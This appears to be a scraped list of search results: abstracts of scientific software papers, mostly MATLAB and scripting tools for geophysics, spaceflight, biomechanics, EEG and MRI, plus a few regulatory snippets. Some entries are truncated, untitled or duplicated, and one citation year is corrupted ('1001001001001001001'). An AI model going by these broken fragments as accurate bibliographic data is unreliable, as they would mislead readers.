The information presented in this Acceptance Test Plan document shows the current status of the General Mission Analysis Tool (GMAT). GMAT is a software system developed by NASA Goddard Space Flight Center (GSFC) in collaboration with the private sector. The GMAT development team continuously performs acceptance tests in order to verify that the software continues to operate properly after updates are made. The GMAT Development team consists of NASA/GSFC Code 583 software developers, NASA/GSFC Code 595 analysts, and contractors of varying professions. GMAT was developed to provide a development approach that maintains involvement from the private sector and academia, encourages collaborative funding from multiple government agencies and the private sector, and promotes the transfer of technology from government funded research to the private sector. GMAT contains many capabilities, such as integrated formation flying modeling and MATLAB compatibility. The propagation capabilities in GMAT allow for fully coupled dynamics modeling of multiple spacecraft, in any flight regime. Other capabilities in GMAT inclucle: user definable coordinate systems, 3-D graphics in any coordinate system GMAT can calculate, 2-D plots, branch commands, solvers, optimizers, GMAT functions, planetary ephemeris sources including DE405, DE200, SLP and analytic models, script events, impulsive and finite maneuver models, and many more. GMAT runs on Windows, Mac, and Linux platforms. Both the Graphical User Interface (GUI) and the GMAT engine were built and tested on all of the mentioned platforms. GMAT was designed for intuitive use from both the GUI and with an importable script language similar to that of MATLAB.
Plouff, Donald
1998-01-01
Computer programs were written in the Fortran language to process and display gravity data with locations expressed in geographic coordinates. The programs and associated processes have been tested for gravity data in an area of about 125,000 square kilometers in northwest Nevada, southeast Oregon, and northeast California. This report discusses the geographic aspects of data processing. Utilization of the programs begins with application of a template (printed in PostScript format) to transfer locations obtained with Global Positioning Systems to and from field maps and includes a 5-digit geographic-based map naming convention for field maps. Computer programs, with source codes that can be copied, are used to display data values (printed in PostScript format) and data coverage, insert data into files, extract data from files, shift locations, test for redundancy, and organize data by map quadrangles. It is suggested that 30-meter Digital Elevation Models needed for gravity terrain corrections and other applications should be accessed in a file search by using the USGS 7.5-minute map name as a file name, for example, file '40117_B8.DEM' contains elevation data for the map with a southeast corner at lat 40? 07' 30' N. and lon 117? 52' 30' W.
Knudsen, Keith L.; Noller, Jay S.; Sowers, Janet M.; Lettis, William R.
1997-01-01
This Open-File report is a digital geologic map database. This pamphlet serves to introduce and describe the digital data. There are no paper maps included in the Open-File report. The report does include, however, PostScript plot files containing the images of the geologic map sheets with explanations, as well as the accompanying text describing the geology of the area. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled 'For Those Who Aren't Familiar With Digital Geologic Map Databases' below. This digital map database, compiled from previously unpublished data, and new mapping by the authors, represents the general distribution of surficial deposits in the San Francisco bay region. Together with the accompanying text file (sf_geo.txt or sf_geo.pdf), it provides current information on Quaternary geology and liquefaction susceptibility of the San Francisco, California, 1:100,000 quadrangle. The database delineates map units that are identified by general age and lithology following the stratigraphic nomenclature of the U.S. Geological Survey. The scale of the source maps limits the spatial resolution (scale) of the database to 1:100,000 or smaller. The content and character of the database, as well as three methods of obtaining the database, are described below.
The automatic neutron guide optimizer guide_bot
NASA Astrophysics Data System (ADS)
Bertelsen, Mads
2017-09-01
The guide optimization software guide_bot is introduced, the main purpose of which is to reduce the time spent programming when performing numerical optimization of neutron guides. A limited amount of information on the overall guide geometry and a figure of merit describing the desired beam is used to generate the code necessary to solve the problem. A generated McStas instrument file performs the Monte Carlo ray-tracing, which is controlled by iFit optimization scripts. The resulting optimal guide is thoroughly characterized, both in terms of brilliance transfer from an idealized source and on a more realistic source such as the ESS Butterfly moderator. Basic MATLAB knowledge is required from the user, but no experience with McStas or iFit is necessary. This paper briefly describes how guide_bot is used and some important aspects of the code. A short validation against earlier work is performed which shows the expected agreement. In addition a scan over the vertical divergence requirement, where individual guide optimizations are performed for each corresponding figure of merit, provides valuable data on the consequences of this parameter. The guide_bot software package is best suited for the start of an instrument design project as it excels at comparing a large amount of different guide alternatives for a specific set of instrument requirements, but is still applicable in later stages as constraints can be used to optimize more specific guides.
A general UNIX interface for biocomputing and network information retrieval software.
Kiong, B K; Tan, T W
1993-10-01
We describe a UNIX program, HYBROW, which can integrate without modification a wide range of UNIX biocomputing and network information retrieval software. HYBROW works in conjunction with a separate set of ASCII files containing embedded hypertext-like links. The program operates like a hypertext browser featuring five basic links: file link, execute-only link, execute-display link, directory-browse link and field-filling link. Useful features of the interface may be developed using combinations of these links with simple shell scripts and examples of these are briefly described. The system manager who supports biocomputing users should find the program easy to maintain, and useful in assisting new and infrequent users; it is also simple to incorporate new programs. Moreover, the individual user can customize the interface, create dynamic menus, hypertext a document, invoke shell scripts and new programs simply with a basic understanding of the UNIX operating system and any text editor. This program was written in C language and uses the UNIX curses and termcap libraries. It is freely available as a tar compressed file (by anonymous FTP from nuscc.nus.sg).
ABM Drag_Pass Report Generator
NASA Technical Reports Server (NTRS)
Fisher, Forest; Gladden, Roy; Khanampornpan, Teerapat
2008-01-01
dragREPORT software was developed in parallel with abmREPORT, which is described in the preceding article. Both programs were built on the capabilities created during that process. This tool generates a drag_pass report that summarizes vital information from the MRO aerobreaking drag_pass build process to facilitate both sequence reviews and provide a high-level summarization of the sequence for mission management. The script extracts information from the ENV, SSF, FRF, SCMFmax, and OPTG files, presenting them in a single, easy-to-check report providing the majority of parameters needed for cross check and verification as part of the sequence review process. Prior to dragReport, all the needed information was spread across a number of different files, each in a different format. This software is a Perl script that extracts vital summarization information and build-process details from a number of source files into a single, concise report format used to aid the MPST sequence review process and to provide a high-level summarization of the sequence for mission management reference. This software could be adapted for future aerobraking missions to provide similar reports, review and summarization information.
Wrapping Python around MODFLOW/MT3DMS based groundwater models
NASA Astrophysics Data System (ADS)
Post, V.
2008-12-01
Numerical models that simulate groundwater flow and solute transport require a great amount of input data that is often organized into different files. A large proportion of the input data consists of spatially-distributed model parameters. The model output consists of a variety data such as heads, fluxes and concentrations. Typically all files have different formats. Consequently, preparing input and managing output is a complex and error-prone task. Proprietary software tools are available that facilitate the preparation of input files and analysis of model outcomes. The use of such software may be limited if it does not support all the features of the groundwater model or when the costs of such tools are prohibitive. Therefore a Python library was developed that contains routines to generate input files and process output files of MODFLOW/MT3DMS based models. The library is freely available and has an open structure so that the routines can be customized and linked into other scripts and libraries. The current set of functions supports the generation of input files for MODFLOW and MT3DMS, including the capability to read spatially-distributed input parameters (e.g. hydraulic conductivity) from PNG files. Both ASCII and binary output files can be read efficiently allowing for visualization of, for example, solute concentration patterns in contour plots with superimposed flow vectors using matplotlib. Series of contour plots are then easily saved as an animation. The subroutines can also be used within scripts to calculate derived quantities such as the mass of a solute within a particular region of the model domain. Using Python as a wrapper around groundwater models provides an efficient and flexible way of processing input and output data, which is not constrained by limitations of third-party products.
NASA Astrophysics Data System (ADS)
Butykai, A.; Domínguez-García, P.; Mor, F. M.; Gaál, R.; Forró, L.; Jeney, S.
2017-11-01
The present document is an update of the previously published MatLab code for the calibration of optical tweezers in the high-resolution detection of the Brownian motion of non-spherical probes [1]. In this instance, an alternative version of the original code, based on the same physical theory [2], but focused on the automation of the calibration of measurements using spherical probes, is outlined. The new added code is useful for high-frequency microrheology studies, where the probe radius is known but the viscosity of the surrounding fluid maybe not. This extended calibration methodology is automatic, without the need of a user's interface. A code for calibration by means of thermal noise analysis [3] is also included; this is a method that can be applied when using viscoelastic fluids if the trap stiffness is previously estimated [4]. The new code can be executed in MatLab and using GNU Octave. Program Files doi:http://dx.doi.org/10.17632/s59f3gz729.1 Licensing provisions: GPLv3 Programming language: MatLab 2016a (MathWorks Inc.) and GNU Octave 4.0 Operating system: Linux and Windows. Supplementary material: A new document README.pdf includes basic running instructions for the new code. Journal reference of previous version: Computer Physics Communications, 196 (2015) 599 Does the new version supersede the previous version?: No. It adds alternative but compatible code while providing similar calibration factors. Nature of problem (approx. 50-250 words): The original code uses a MatLab-provided user's interface, which is not available in GNU Octave, and cannot be used outside of a proprietary software as MatLab. Besides, the process of calibration when using spherical probes needs an automatic method when calibrating big amounts of different data focused to microrheology. Solution method (approx. 50-250 words): The new code can be executed in the latest version of MatLab and using GNU Octave, a free and open-source alternative to MatLab. This code generates an automatic calibration process which requires only to write the input data in the main script. Additionally, we include a calibration method based on thermal noise statistics, which can be used with viscoelastic fluids if the trap stiffness is previously estimated. Reasons for the new version: This version extends the functionality of PFMCal for the particular case of spherical probes and unknown fluid viscosities. The extended code is automatic, works in different operating systems and it is compatible with GNU Octave. Summary of revisions: The original MatLab program in the previous version, which is executed by PFMCal.m, is not changed. Here, we have added two additional main archives named PFMCal_auto.m and PFMCal_histo.m, which implement automatic calculations of the calibration process and calibration through Boltzmann statistics, respectively. The process of calibration using this code for spherical beads is described in the README.pdf file provided in the new code submission. Here, we obtain different calibration factors, β (given in μm/V), according to [2], related to two statistical quantities: the mean-squared displacement (MSD), βMSD, and the velocity autocorrelation function (VAF), βVAF. Using that methodology, the trap stiffness, k, and the zero-shear viscosity of the fluid, η, can be calculated if the value of the particle's radius, a, is previously known. For comparison, we include in the extended code the method of calibration using the corner frequency of the power-spectral density (PSD) [5], providing a calibration factor βPSD. Besides, with the prior estimation of the trap stiffness, along with the known value of the particle's radius, we can use thermal noise statistics to obtain calibration factors, β, according to the quadratic form of the optical potential, βE, and related to the Gaussian distribution of the bead's positions, βσ2. This method has been demonstrated to be applicable to the calibration of optical tweezers when using non-Newtonian viscoelastic polymeric liquids [4]. An example of the results using this calibration process is summarized in Table 1. Using the data provided in the new code submission, for water and acetone fluids, we calculate all the calibration factors by using the original PFMCal.m and by the new non-GUI code PFMCal_auto.m and PFMCal_histo.m. Regarding the new code, PFMCal_auto.m returns η, k, βMSD, βVAF and βPSD, while PFMCal_histo.m provides βσ2 and βE. Table 1 shows how we obtain the expected viscosity of the two fluids at this temperature and how the different methods provide good agreement between trap stiffnesses and calibration factors. Additional comments including Restrictions and Unusual features (approx. 50-250 words): The original code, PFMCal.m, runs under MatLab using the Statistics Toolbox. The extended code, PFMCal_auto.m and PFMCal_histo.m, can be executed without modification using MatLab or GNU Octave. The code has been tested in Linux and Windows operating systems.
MILAMIN 2 - Fast MATLAB FEM solver
NASA Astrophysics Data System (ADS)
Dabrowski, Marcin; Krotkiewski, Marcin; Schmid, Daniel W.
2013-04-01
MILAMIN is a free and efficient MATLAB-based two-dimensional FEM solver utilizing unstructured meshes [Dabrowski et al., G-cubed (2008)]. The code consists of steady-state thermal diffusion and incompressible Stokes flow solvers implemented in approximately 200 lines of native MATLAB code. The brevity makes the code easily customizable. An important quality of MILAMIN is speed - it can handle millions of nodes within minutes on one CPU core of a standard desktop computer, and is faster than many commercial solutions. The new MILAMIN 2 allows three-dimensional modeling. It is designed as a set of functional modules that can be used as building blocks for efficient FEM simulations using MATLAB. The utilities are largely implemented as native MATLAB functions. For performance critical parts we use MUTILS - a suite of compiled MEX functions optimized for shared memory multi-core computers. The most important features of MILAMIN 2 are: 1. Modular approach to defining, tracking, and discretizing the geometry of the model 2. Interfaces to external mesh generators (e.g., Triangle, Fade2d, T3D) and mesh utilities (e.g., element type conversion, fast point location, boundary extraction) 3. Efficient computation of the stiffness matrix for a wide range of element types, anisotropic materials and three-dimensional problems 4. Fast global matrix assembly using a dedicated MEX function 5. Automatic integration rules 6. Flexible prescription (spatial, temporal, and field functions) and efficient application of Dirichlet, Neuman, and periodic boundary conditions 7. Treatment of transient and non-linear problems 8. Various iterative and multi-level solution strategies 9. Post-processing tools (e.g., numerical integration) 10. Visualization primitives using MATLAB, and VTK export functions We provide a large number of examples that show how to implement a custom FEM solver using the MILAMIN 2 framework. The examples are MATLAB scripts of increasing complexity that address a given technical topic (e.g., creating meshes, reordering nodes, applying boundary conditions), a given numerical topic (e.g., using various solution strategies, non-linear iterations), or that present a fully-developed solver designed to address a scientific topic (e.g., performing Stokes flow simulations in synthetic porous medium). References: Dabrowski, M., M. Krotkiewski, and D. W. Schmid MILAMIN: MATLAB-based finite element method solver for large problems, Geochem. Geophys. Geosyst., 9, Q04030, 2008
OPTICON: Pro-Matlab software for large order controlled structure design
NASA Technical Reports Server (NTRS)
Peterson, Lee D.
1989-01-01
A software package for large order controlled structure design is described and demonstrated. The primary program, called OPTICAN, uses both Pro-Matlab M-file routines and selected compiled FORTRAN routines linked into the Pro-Matlab structure. The program accepts structural model information in the form of state-space matrices and performs three basic design functions on the model: (1) open loop analyses; (2) closed loop reduced order controller synthesis; and (3) closed loop stability and performance assessment. The current controller synthesis methods which were implemented in this software are based on the Generalized Linear Quadratic Gaussian theory of Bernstein. In particular, a reduced order Optimal Projection synthesis algorithm based on a homotopy solution method was successfully applied to an experimental truss structure using a 58-state dynamic model. These results are presented and discussed. Current plans to expand the practical size of the design model to several hundred states and the intention to interface Pro-Matlab to a supercomputing environment are discussed.
Liu, Yijin; Meirer, Florian; Williams, Phillip A.; Wang, Junyue; Andrews, Joy C.; Pianetta, Piero
2012-01-01
Transmission X-ray microscopy (TXM) has been well recognized as a powerful tool for non-destructive investigation of the three-dimensional inner structure of a sample with spatial resolution down to a few tens of nanometers, especially when combined with synchrotron radiation sources. Recent developments of this technique have presented a need for new tools for both system control and data analysis. Here a software package developed in MATLAB for script command generation and analysis of TXM data is presented. The first toolkit, the script generator, allows automating complex experimental tasks which involve up to several thousand motor movements. The second package was designed to accomplish computationally intense tasks such as data processing of mosaic and mosaic tomography datasets; dual-energy contrast imaging, where data are recorded above and below a specific X-ray absorption edge; and TXM X-ray absorption near-edge structure imaging datasets. Furthermore, analytical and iterative tomography reconstruction algorithms were implemented. The compiled software package is freely available. PMID:22338691
Computer Software Configuration Item-Specific Flight Software Image Transfer Script Generator
NASA Technical Reports Server (NTRS)
Bolen, Kenny; Greenlaw, Ronald
2010-01-01
A K-shell UNIX script enables the International Space Station (ISS) Flight Control Team (FCT) operators in NASA s Mission Control Center (MCC) in Houston to transfer an entire or partial computer software configuration item (CSCI) from a flight software compact disk (CD) to the onboard Portable Computer System (PCS). The tool is designed to read the content stored on a flight software CD and generate individual CSCI transfer scripts that are capable of transferring the flight software content in a given subdirectory on the CD to the scratch directory on the PCS. The flight control team can then transfer the flight software from the PCS scratch directory to the Electronically Erasable Programmable Read Only Memory (EEPROM) of an ISS Multiplexer/ Demultiplexer (MDM) via the Indirect File Transfer capability. The individual CSCI scripts and the CSCI Specific Flight Software Image Transfer Script Generator (CFITSG), when executed a second time, will remove all components from their original execution. The tool will identify errors in the transfer process and create logs of the transferred software for the purposes of configuration management.
Xu, Jingping; Lightsom, Fran; Noble, Marlene A.; Denham, Charles
2002-01-01
During the past several years, the sediment transport group in the Coastal and Marine Geology Program (CMGP) of the U. S. Geological Survey has made major revisions to its methodology of processing, analyzing, and maintaining the variety of oceanographic time-series data. First, CMGP completed the transition of the its oceanographic time-series database to a self-documenting NetCDF (Rew et al., 1997) data format. Second, CMGP’s oceanographic data variety and complexity have been greatly expanded from traditional 2-dimensional, single-point time-series measurements (e.g., Electro-magnetic current meters, transmissometers) to more advanced 3-dimensional and profiling time-series measurements due to many new acquisitions of modern instruments such as Acoustic Doppler Current Profiler (RDI, 1996), Acoustic Doppler Velocitimeter, Pulse-Coherence Acoustic Doppler Profiler (SonTek, 2001), Acoustic Bacscatter Sensor (Aquatec, 1001001001001001001). In order to accommodate the NetCDF format of data from the new instruments, a software package of processing, analyzing, and visualizing time-series oceanographic data was developed. It is named CMGTooL. The CMGTooL package contains two basic components: a user-friendly GUI for NetCDF file analysis, processing and manipulation; and a data analyzing program library. Most of the routines in the library are stand-alone programs suitable for batch processing. CMGTooL is written in MATLAB computing language (The Mathworks, 1997), therefore users must have MATLAB installed on their computer in order to use this software package. In addition, MATLAB’s Signal Processing Toolbox is also required by some CMGTooL’s routines. Like most MATLAB programs, all CMGTooL codes are compatible with different computing platforms including PC, MAC, and UNIX machines (Note: CMGTooL has been tested on different platforms that run MATLAB 5.2 (Release 10) or lower versions. Some of the commands related to MAC may not be compatible with later releases of MATLAB). The GUI and some of the library routines call low-level NetCDF file I/O, variable and attribute functions. These NetCDF exclusive functions are supported by a MATLAB toolbox named NetCDF, created by Dr. Charles Denham . This toolbox has to be installed in order to use the CMGTooL GUI. The CMGTooL GUI calls several routines that were initially developed by others. The authors would like to acknowledge the following scientists for their ideas and codes: Dr. Rich Signell (USGS), Dr. Chris Sherwood (USGS), and Dr. Bob Beardsley (WHOI). Many special terms that carry special meanings in either MATLAB or the NetCDF Toolbox are used in this manual. Users are encouraged to read the documents of MATLAB and NetCDF for references.
3-D Synthetic Microstructure Generation with Ellipsoid Particles
2016-09-27
MATLAB scripts in Appendix A, Appendix B, and Appendix C by using 3 -D matrices, where the background is 0 and the particle is 1. For the 3 -D ellipses, it...iy(iy== 0 )=image_size(2); nlo = z0 - floor(diam/2); nhi = z0 + ceil(diam/2)-1; iz = mod(nlo:nhi,image_size( 3 ));iz(iz== 0 )=image_size( 3 ); Itest = logical...z0 + ceil(diam/2)-1; iz = mod(nlo:nhi,image_size( 3 )); iz(iz== 0 )=image_size( 3 ); Itest = logical(I(ix,iy,iz)); if sum(Itest(I_ellipse)) == 0 Itest
Demonstration of New OLAF Capabilities and Technologies
NASA Astrophysics Data System (ADS)
Kingston, C.; Palmer, E.; Stone, J.; Neese, C.; Mueller, B.
2017-06-01
Upgrades to the On-Line Archiving Facility (OLAF) PDS tool are leading to improved usability and additional functionality by integration of JavaScript web app frameworks. Also included is the capability to upload tabular data as CSV files.
2018-01-31
Language for SeBBAS ............................................................... 23 2.4.3 Running SeBBAS Algorithm in MATLAB...Input File Error Checking ................................................................................................... 76 4.4.3 Running ...99 6.2 5- Blade Rotor System Investigation
Gro2mat: a package to efficiently read gromacs output in MATLAB.
Dien, Hung; Deane, Charlotte M; Knapp, Bernhard
2014-07-30
Molecular dynamics (MD) simulations are a state-of-the-art computational method used to investigate molecular interactions at atomic scale. Interaction processes out of experimental reach can be monitored using MD software, such as Gromacs. Here, we present the gro2mat package that allows fast and easy access to Gromacs output files from Matlab. Gro2mat enables direct parsing of the most common Gromacs output formats including the binary xtc-format. No openly available Matlab parser currently exists for this format. The xtc reader is orders of magnitudes faster than other available pdb/ascii workarounds. Gro2mat is especially useful for scientists with an interest in quick prototyping of new mathematical and statistical approaches for Gromacs trajectory analyses. © 2014 Wiley Periodicals, Inc. Copyright © 2014 Wiley Periodicals, Inc.
17 CFR 232.11 - Definition of terms used in part 232.
Code of Federal Regulations, 2010 CFR
2010-04-01
..., PDF, and static graphic files. Such code may be in binary (machine language) or in script form... Act means the Trust Indenture Act of 1939. Unofficial PDF copy. The term unofficial PDF copy means an...
16 CFR 322.9 - Recordkeeping and compliance requirements.
Code of Federal Regulations, 2012 CFR
2012-01-01
... consumer files containing the names, phone numbers, dollar amounts paid, and descriptions of mortgage... scripts, training materials, commercial communications, or other marketing materials, including websites... all consumer complaints; and (iii) Ascertaining the number and nature of consumer complaints regarding...
16 CFR 322.9 - Recordkeeping and compliance requirements.
Code of Federal Regulations, 2011 CFR
2011-01-01
... consumer files containing the names, phone numbers, dollar amounts paid, and descriptions of mortgage... scripts, training materials, commercial communications, or other marketing materials, including websites... all consumer complaints; and (iii) Ascertaining the number and nature of consumer complaints regarding...
NASA Astrophysics Data System (ADS)
Mlawsky, E. T.; Louie, J. N.; Pohll, G.; Carlson, C. W.; Blakely, R. J.
2015-12-01
Understanding the potential availability of water resources in Eastern California aquifers is of critical importance to making water management policy decisions and determining best-use practices for California, as well as for downstream use in Nevada. Hydrologic well log data can provide valuable information on aquifer capacity, but is often proprietarily inaccessible or economically unfeasible to obtain in sufficient quantity. In the case of basin-fill aquifers, it is possible to make estimates of aquifer geometry and volume using geophysical surveys of gravity, constrained by additional geophysical and geological observations. We use terrestrial gravity data to model depth-to-basement about the Bridgeport, CA basin for application in preserving the Walker Lake biome. In constructing the model, we assess several hundred gravity observations, existing and newly collected. We regard these datasets as "bulk," as the data are compiled from multiple sources. Inconsistencies among datasets can result in "static offsets," or artificial bull's-eye contours, within the gradient. Amending suspect offsets requires the attention of the modeler; picking these offsets by hand can be a time-consuming process when modeling large-scale basin features. We develop a MATLAB script for interpolating the residual Bouguer anomaly about the basin using sparse observation points, and leveling offset points with a user-defined sensitivity. The script is also capable of plotting gravity profiles between any two endpoints within the map extent. The resulting anomaly map provides an efficient means of locating and removing static offsets in the data, while also providing a fast visual representation of a bulk dataset. Additionally, we obtain gridded basin gravity models with an open-source alternative to proprietary modeling tools.
NASA Astrophysics Data System (ADS)
2000-01-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Looking back on Physics Peter Gill Lecturer in Education, School of Education, King's College London, Franklin-Wilkins Building, Waterloo Road, London SE1 8WA
Delorme, Arnaud; Makeig, Scott
2004-03-15
We have developed a toolbox and graphic user interface, EEGLAB, running under the crossplatform MATLAB environment (The Mathworks, Inc.) for processing collections of single-trial and/or averaged EEG data of any number of channels. Available functions include EEG data, channel and event information importing, data visualization (scrolling, scalp map and dipole model plotting, plus multi-trial ERP-image plots), preprocessing (including artifact rejection, filtering, epoch selection, and averaging), independent component analysis (ICA) and time/frequency decompositions including channel and component cross-coherence supported by bootstrap statistical methods based on data resampling. EEGLAB functions are organized into three layers. Top-layer functions allow users to interact with the data through the graphic interface without needing to use MATLAB syntax. Menu options allow users to tune the behavior of EEGLAB to available memory. Middle-layer functions allow users to customize data processing using command history and interactive 'pop' functions. Experienced MATLAB users can use EEGLAB data structures and stand-alone signal processing functions to write custom and/or batch analysis scripts. Extensive function help and tutorial information are included. A 'plug-in' facility allows easy incorporation of new EEG modules into the main menu. EEGLAB is freely available (http://www.sccn.ucsd.edu/eeglab/) under the GNU public license for noncommercial use and open source development, together with sample data, user tutorial and extensive documentation.
Generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB.
Lee, Leng-Feng; Umberger, Brian R
2016-01-01
Computer modeling, simulation and optimization are powerful tools that have seen increased use in biomechanics research. Dynamic optimizations can be categorized as either data-tracking or predictive problems. The data-tracking approach has been used extensively to address human movement problems of clinical relevance. The predictive approach also holds great promise, but has seen limited use in clinical applications. Enhanced software tools would facilitate the application of predictive musculoskeletal simulations to clinically-relevant research. The open-source software OpenSim provides tools for generating tracking simulations but not predictive simulations. However, OpenSim includes an extensive application programming interface that permits extending its capabilities with scripting languages such as MATLAB. In the work presented here, we combine the computational tools provided by MATLAB with the musculoskeletal modeling capabilities of OpenSim to create a framework for generating predictive simulations of musculoskeletal movement based on direct collocation optimal control techniques. In many cases, the direct collocation approach can be used to solve optimal control problems considerably faster than traditional shooting methods. Cyclical and discrete movement problems were solved using a simple 1 degree of freedom musculoskeletal model and a model of the human lower limb, respectively. The problems could be solved in reasonable amounts of time (several seconds to 1-2 hours) using the open-source IPOPT solver. The problems could also be solved using the fmincon solver that is included with MATLAB, but the computation times were excessively long for all but the smallest of problems. The performance advantage for IPOPT was derived primarily by exploiting sparsity in the constraints Jacobian. The framework presented here provides a powerful and flexible approach for generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB. This should allow researchers to more readily use predictive simulation as a tool to address clinical conditions that limit human mobility.
Generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB
Lee, Leng-Feng
2016-01-01
Computer modeling, simulation and optimization are powerful tools that have seen increased use in biomechanics research. Dynamic optimizations can be categorized as either data-tracking or predictive problems. The data-tracking approach has been used extensively to address human movement problems of clinical relevance. The predictive approach also holds great promise, but has seen limited use in clinical applications. Enhanced software tools would facilitate the application of predictive musculoskeletal simulations to clinically-relevant research. The open-source software OpenSim provides tools for generating tracking simulations but not predictive simulations. However, OpenSim includes an extensive application programming interface that permits extending its capabilities with scripting languages such as MATLAB. In the work presented here, we combine the computational tools provided by MATLAB with the musculoskeletal modeling capabilities of OpenSim to create a framework for generating predictive simulations of musculoskeletal movement based on direct collocation optimal control techniques. In many cases, the direct collocation approach can be used to solve optimal control problems considerably faster than traditional shooting methods. Cyclical and discrete movement problems were solved using a simple 1 degree of freedom musculoskeletal model and a model of the human lower limb, respectively. The problems could be solved in reasonable amounts of time (several seconds to 1–2 hours) using the open-source IPOPT solver. The problems could also be solved using the fmincon solver that is included with MATLAB, but the computation times were excessively long for all but the smallest of problems. The performance advantage for IPOPT was derived primarily by exploiting sparsity in the constraints Jacobian. The framework presented here provides a powerful and flexible approach for generating optimal control simulations of musculoskeletal movement using OpenSim and MATLAB. This should allow researchers to more readily use predictive simulation as a tool to address clinical conditions that limit human mobility. PMID:26835184
bioalcidae, samjs and vcffilterjs: object-oriented formatters and filters for bioinformatics files.
Lindenbaum, Pierre; Redon, Richard
2018-04-01
Reformatting and filtering bioinformatics files are common tasks for bioinformaticians. Standard Linux tools and specific programs are usually used to perform such tasks but there is still a gap between using these tools and the programming interface of some existing libraries. In this study, we developed a set of tools namely bioalcidae, samjs and vcffilterjs that reformat or filter files using a JavaScript engine or a pure java expression and taking advantage of the java API for high-throughput sequencing data (htsjdk). https://github.com/lindenb/jvarkit. pierre.lindenbaum@univ-nantes.fr.
NASA Astrophysics Data System (ADS)
Yamagishi, Y.; Yanaka, H.; Tsuboi, S.
2009-12-01
We have developed a conversion tool for the data of seismic tomography into KML, called KML generator, and made it available on the web site (http://www.jamstec.go.jp/pacific21/google_earth). The KML generator enables us to display vertical and horizontal cross sections of the model on Google Earth in three-dimensional manner, which would be useful to understand the Earth's interior. The previous generator accepts text files of grid-point data having longitude, latitude, and seismic velocity anomaly. Each data file contains the data for each depth. Metadata, such as bibliographic reference, grid-point interval, depth, are described in other information file. We did not allow users to upload their own tomographic model to the web application, because there is not standard format to represent tomographic model. Recently European seismology research project, NEIRES (Network of Research Infrastructures for European Seismology), advocates that the data of seismic tomography should be standardized. They propose a new format based on JSON (JavaScript Object Notation), which is one of the data-interchange formats, as a standard one for the tomography. This format consists of two parts, which are metadata and grid-point data values. The JSON format seems to be powerful to handle and to analyze the tomographic model, because the structure of the format is fully defined by JavaScript objects, thus the elements are directly accessible by a script. In addition, there exist JSON libraries for several programming languages. The International Federation of Digital Seismograph Network (FDSN) adapted this format as a FDSN standard format for seismic tomographic model. There might be a possibility that this format would not only be accepted by European seismologists but also be accepted as the world standard. Therefore we improve our KML generator for seismic tomography to accept the data file having also JSON format. We also improve the web application of the generator so that the JSON formatted data file can be uploaded. Users can convert any tomographic model data to KML. The KML obtained through the new generator should provide an arena to compare various tomographic models and other geophysical observations on Google Earth, which may act as a common platform for geoscience browser.
University of Massachusetts Marine Renewable Energy Center Waverider Bouy Data
Lohrenz, Steven
2015-10-07
The compressed (.zip) file contains Datawell MK-III Directional Waverider binary and unpacked data files as well as a description of the data and manuals for the instrumentation. The data files are contained in the two directories within the zip file, ''Apr_July_2012'' and ''Jun_Sept_2013''. Time series and summary data were recorded in the buoy to binary files with extensions '.RDT' and '.SDT', respectively. These are located in the subdirectories 'Data_Raw' in each of the top-level deployment directories. '.RDT' files contain 3 days of time series (at 1.28 Hz) in 30 minute "bursts". Each '.SDT' file contains summary statistics for the month indicated computed at half-hour intervals for each burst. Each deployment directory also contains a description (in 'File.list') of the Datawell binary data files, and a figure ('Hs_vs_yearday') showing the significant wave height associated with each .RDT file (decoded from the filename). The corresponding unpacked Matlab .mat files are contained in the subdirectories 'Data_Mat'. These files have the extension '.mat' but use the root filename of the source .RDT and .SDT files.
Extraction of CT dose information from DICOM metadata: automated Matlab-based approach.
Dave, Jaydev K; Gingold, Eric L
2013-01-01
The purpose of this study was to extract exposure parameters and dose-relevant indexes of CT examinations from information embedded in DICOM metadata. DICOM dose report files were identified and retrieved from a PACS. An automated software program was used to extract from these files information from the structured elements in the DICOM metadata relevant to exposure. Extracting information from DICOM metadata eliminated potential errors inherent in techniques based on optical character recognition, yielding 100% accuracy.
Ravi, Keerthi Sravan; Potdar, Sneha; Poojar, Pavan; Reddy, Ashok Kumar; Kroboth, Stefan; Nielsen, Jon-Fredrik; Zaitsev, Maxim; Venkatesan, Ramesh; Geethanath, Sairam
2018-03-11
To provide a single open-source platform for comprehensive MR algorithm development inclusive of simulations, pulse sequence design and deployment, reconstruction, and image analysis. We integrated the "Pulseq" platform for vendor-independent pulse programming with Graphical Programming Interface (GPI), a scientific development environment based on Python. Our integrated platform, Pulseq-GPI, permits sequences to be defined visually and exported to the Pulseq file format for execution on an MR scanner. For comparison, Pulseq files using either MATLAB only ("MATLAB-Pulseq") or Python only ("Python-Pulseq") were generated. We demonstrated three fundamental sequences on a 1.5 T scanner. Execution times of the three variants of implementation were compared on two operating systems. In vitro phantom images indicate equivalence with the vendor supplied implementations and MATLAB-Pulseq. The examples demonstrated in this work illustrate the unifying capability of Pulseq-GPI. The execution times of all the three implementations were fast (a few seconds). The software is capable of user-interface based development and/or command line programming. The tool demonstrated here, Pulseq-GPI, integrates the open-source simulation, reconstruction and analysis capabilities of GPI Lab with the pulse sequence design and deployment features of Pulseq. Current and future work includes providing an ISMRMRD interface and incorporating Specific Absorption Ratio and Peripheral Nerve Stimulation computations. Copyright © 2018 Elsevier Inc. All rights reserved.
Using ABAQUS Scripting Interface for Materials Evaluation and Life Prediction
NASA Technical Reports Server (NTRS)
Powers, Lynn M.; Arnold, Steven M.; Baranski, Andrzej
2006-01-01
An ABAQUS script has been written to aid in the evaluation of the mechanical behavior of viscoplastic materials. The purposes of the script are to: handle complex load histories; control load/displacement with alternate stopping criteria; predict failure and life; and verify constitutive models. Material models from the ABAQUS library may be used or the UMAT routine may specify mechanical behavior. User subroutines implemented include: UMAT for the constitutive model; UEXTERNALDB for file manipulation; DISP for boundary conditions; and URDFIL for results processing. Examples presented include load, strain and displacement control tests on a single element model. The tests are creep with a life limiting strain criterion, strain control with a stress limiting cycle and a complex interrupted cyclic relaxation test. The techniques implemented in this paper enable complex load conditions to be solved efficiently with ABAQUS.
